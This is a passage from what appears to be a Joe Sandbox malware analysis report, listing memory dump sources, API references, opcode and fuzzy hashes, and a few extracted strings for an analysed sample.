                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 57415cbfcd9dc791843391966df2c7fade6b14bf286cccdd9bfbe8ec8f2036f6
                                  • Instruction ID: 53fa28984a30f1bafcc7e5297224e14e9ef364a3e23895abf495a1bc9db2eb5d
                                  • Opcode Fuzzy Hash: 57415cbfcd9dc791843391966df2c7fade6b14bf286cccdd9bfbe8ec8f2036f6
                                  • Instruction Fuzzy Hash: D101F932614219AFCF15DF59CC05C9E7B69DB81334B341658F890BB2D1E6B1ED819BD0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D2220E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID:
                                  • API String ID: 2659868963-0
                                  • Opcode ID: 31cd7e249cfde1dc418a58985caa0acdc3abfaa63db44c906279af9edcb37909
                                  • Instruction ID: 29545cc48899358ad9b1f533f440f77292fbb1c343f2eeb32b0f54aea6623bdb
                                  • Opcode Fuzzy Hash: 31cd7e249cfde1dc418a58985caa0acdc3abfaa63db44c906279af9edcb37909
                                  • Instruction Fuzzy Hash: 99012B3550030DBBCB14AF98EC029A977ECDE00314F14C435FB18EB991E770E99487A4
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00E091F7,00000000,?,00E15D79,00000001,00000364,00000000,00000006,000000FF,?,00000000,00E0D244,00E089C3,00E091F7,00000000), ref: 00E16435
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: fac18176b3e75ec29b54ca59d0cd0732fd6fcce98546baf151b7703e640a4019
                                  • Instruction ID: 62e5de23e57c9649fb24c09aca27569df966be724721ce8f98f77e6aa5267dc3
                                  • Opcode Fuzzy Hash: fac18176b3e75ec29b54ca59d0cd0732fd6fcce98546baf151b7703e640a4019
                                  • Instruction Fuzzy Hash: 30F0893150522466DB216B629C06BDF7B9AFF41768F15B455BD28B61C0CB30EC9186F1
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,00E1D635,00000000,?,00E1D635,00000220,?,W,00000000), ref: 00E16E60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: eb244c6205ba0b4a87dc00121d82e144ea96ca3290f8de8c35e58b1bc3550621
                                  • Instruction ID: 96eb37e2e0eb1d71e016fa144ece7eb1a7539627e1e6b7704dba17b9b62353a1
                                  • Opcode Fuzzy Hash: eb244c6205ba0b4a87dc00121d82e144ea96ca3290f8de8c35e58b1bc3550621
                                  • Instruction Fuzzy Hash: 2DE0ED391006216ADE3022A6ED00BDB768DCF823A5F053721BD16B60D0CB20CAC082E4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 479dccd83ff6072a932cdb467727282e91ad892144bc03e743fc5c00728b04e8
                                  • Instruction ID: 20351ebfc694b05a869dbc5ef3dead3e95d59a39b746aac5c89d0e00c71f7bab
                                  • Opcode Fuzzy Hash: 479dccd83ff6072a932cdb467727282e91ad892144bc03e743fc5c00728b04e8
                                  • Instruction Fuzzy Hash: E61101B760C318EFBB4AD5A6679C57B77AAFAD32343388476F802C3002E5649D0A6130
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e89c4420c8d4c63f8315a01a48ac90e6eae488226843e61396cd5facd8d22d4d
                                  • Instruction ID: 16f020d2e6140dc3a94300e535ee657308b70cc93c43bdc26a3de1b3a6aaa337
                                  • Opcode Fuzzy Hash: e89c4420c8d4c63f8315a01a48ac90e6eae488226843e61396cd5facd8d22d4d
                                  • Instruction Fuzzy Hash: 1001F1B760C228EF7A0AD1926B8857B779BE9D22383788076FC07C3102E5588D0A7130
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e384c37903b0c282a71a9225d6031304e33b0bb9b9efa59919f9003b3c246075
                                  • Instruction ID: 22da2b0235966a53d91a16300da1090f0793dc069dc7c80978edbdd70efcf508
                                  • Opcode Fuzzy Hash: e384c37903b0c282a71a9225d6031304e33b0bb9b9efa59919f9003b3c246075
                                  • Instruction Fuzzy Hash: 530147E7A08218EF771AE0A2169D6BAB757EAC22383784439FC03D7102F4058D0A6020
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b67f3afa15b0067caddc8372acb88cf72762ca6a4b89fc09345d2501bcd4cbf
                                  • Instruction ID: ac0e2a6088c2bf5300992e512944d9cb9ea5616d7f5090f28e70cdbe14dfec7b
                                  • Opcode Fuzzy Hash: 5b67f3afa15b0067caddc8372acb88cf72762ca6a4b89fc09345d2501bcd4cbf
                                  • Instruction Fuzzy Hash: 450147E3A0C218EFFB59D192668967B7797E6C32387784476FC03DB202F5548D0A3121
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ea226ba3317518a176b4f07b933008cafac75dff16cf2b1ab4028a4b48957ad
                                  • Instruction ID: 648f358096cc0f12e3d19f6d88f3729f837c928e639b8bd32e48983f2b5f8bcc
                                  • Opcode Fuzzy Hash: 6ea226ba3317518a176b4f07b933008cafac75dff16cf2b1ab4028a4b48957ad
                                  • Instruction Fuzzy Hash: E5017BF7608218EF770AE1622A9D1FBB717E6C22383384479FC03D7142E4549E0A6020
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75f93a8058da59b374bb2c1f3a18e9a3971f146377ed3c074545309c2f3d0519
                                  • Instruction ID: 79344cd92cb3052632faba7948f55423fe68c8f48540180e00c27d1174e1ef7d
                                  • Opcode Fuzzy Hash: 75f93a8058da59b374bb2c1f3a18e9a3971f146377ed3c074545309c2f3d0519
                                  • Instruction Fuzzy Hash: 010121B760C218EFBA09E196278857B775BE5C22383788476FC03C7102E5948D0A3130
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f78af77e6e5c4d4653d5796d9f41e5653ecf99fb71da967a7dfe802b1d828cc1
                                  • Instruction ID: 482c75c0f148334fd0718e7f459bf366bee1c05f00275bc747105a1dfc95de33
                                  • Opcode Fuzzy Hash: f78af77e6e5c4d4653d5796d9f41e5653ecf99fb71da967a7dfe802b1d828cc1
                                  • Instruction Fuzzy Hash: 690170B360D114DFAB16C19129985BB7757E9C323833844B5FC42D7002E5594E0B6131
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f156f0975e0530a888170cec49e92ab675148ab509844de14e56345bc37dbde8
                                  • Instruction ID: 4cb0337014280b132e1b02488b5b70d62499620873877e03bf058dd601ae3b83
                                  • Opcode Fuzzy Hash: f156f0975e0530a888170cec49e92ab675148ab509844de14e56345bc37dbde8
                                  • Instruction Fuzzy Hash: 0CF0E2B771C229EF7A19E0A7664C5BF766BA5C22383788036F802C3002E5588D0A3130
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce276e338e20242aad05af2d396e36b2d6d741b92c0630cb9b6a4fc32dd59f60
                                  • Instruction ID: d0bfe60d67e4231fa303e6b721b7786dcf67b123c17913c4c0ba27e16f01e672
                                  • Opcode Fuzzy Hash: ce276e338e20242aad05af2d396e36b2d6d741b92c0630cb9b6a4fc32dd59f60
                                  • Instruction Fuzzy Hash: 58E02BBB71C21CDE6715F0A626985BB7797D5C12383B48072F802D3401E569880F6130
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $$%s|%s$,$,$.$.$131$:$arqt$irvl$kwbt$type must be boolean, but is $|N$|N
                                  • API String ID: 0-3825697014
                                  • Opcode ID: 22dec3f6252744b51e5bc7026f49acc0156f32b390a23ba4d94900cd4e2b51e4
                                  • Instruction ID: 10dca8d94dd00a5a0aae62a85abf6be4cf4785908b823db4f36ff86f37e28c5f
                                  • Opcode Fuzzy Hash: 22dec3f6252744b51e5bc7026f49acc0156f32b390a23ba4d94900cd4e2b51e4
                                  • Instruction Fuzzy Hash: 7523C070D002588FDB28DF68C859BEDBBB4EF05314F188199E549AB292DB359E84CF71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: File$bkg`$eHlW$l$lwcf$p$t
                                  • API String ID: 0-3184506882
                                  • Opcode ID: 3cfd3b9d2593f7ed9bf469cff4b0949a3b6b26783333687982fdd9b7a57818e6
                                  • Instruction ID: 69462f5a0a51195fc5a1420c0c77d3de9c3d00ad6c8ed14f7a6528d81e861763
                                  • Opcode Fuzzy Hash: 3cfd3b9d2593f7ed9bf469cff4b0949a3b6b26783333687982fdd9b7a57818e6
                                  • Instruction Fuzzy Hash: FDC1CC70D0022DAEEF24CFA4DC95BEEBBB9EF04304F144069E504BB281DB719A45CB65
                                  Strings
                                  • unordered_map/set too long, xrefs: 00D978C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: unordered_map/set too long
                                  • API String ID: 0-306623848
                                  • Opcode ID: e823d01d0b6b5db39bd1a0d973ed913041dea7122c3e3cbdc6003bc2fc3aa794
                                  • Instruction ID: bf8d2d45b5bebbac8281da98d29c7bf4628705747ad46e018c7d08bd180291f1
                                  • Opcode Fuzzy Hash: e823d01d0b6b5db39bd1a0d973ed913041dea7122c3e3cbdc6003bc2fc3aa794
                                  • Instruction Fuzzy Hash: BF626171E046199FCF14DF6CC8806ADBBF5FF48314F288269E819AB395D730A951CBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction ID: e33f6df9bb4a2ca3f8a116d4ce7e6e5c96ebe36a9e363b98f1bf169ae0e08209
                                  • Opcode Fuzzy Hash: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction Fuzzy Hash: 3A024C71E002199BDF14CFA8D9806AEBBF1FF48314F65926AD559F7380DB31A941CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
                                  • API String ID: 0-1144537432
                                  • Opcode ID: 5dac5ed0456a3fb97de4868f27ec2a4fa7ca7341f39aff0eaae5eb4d273565aa
                                  • Instruction ID: dd5d58e9a61f134a896faab065cc1db64e51eda3e23aea1e686827ec85ec9db2
                                  • Opcode Fuzzy Hash: 5dac5ed0456a3fb97de4868f27ec2a4fa7ca7341f39aff0eaae5eb4d273565aa
                                  • Instruction Fuzzy Hash: 70912672E006189FCB08CF6CE8517DDB7A9EB88310F14827EE819E7395E6759D05CBA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /$/\/$\
                                  • API String ID: 0-1523196992
                                  • Opcode ID: fea12d3e870321bf3c406ad8b8ef7202e3e3e1bbe853536c70fe5de0b34205fb
                                  • Instruction ID: 8b2292ee533f1bc205eb28c6c1d189ff274c69c59c6061fb7cf2a6b4d33499be
                                  • Opcode Fuzzy Hash: fea12d3e870321bf3c406ad8b8ef7202e3e3e1bbe853536c70fe5de0b34205fb
                                  • Instruction Fuzzy Hash: 3F920371D002688FDF14CFA8D8A46EEFBB5EF65318F1842ADD445A7281E7319A46CB70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: `ic$eIcm$yNrw
                                  • API String ID: 0-2666854388
                                  • Opcode ID: 7a86bae7b52eba615fee289beb30cc65518e57e864a21739d599d2851cc85f02
                                  • Instruction ID: 98e65c1022540c7b5d7abd55b29d2b8e86bdc8fd105b47cc46818069e46eee92
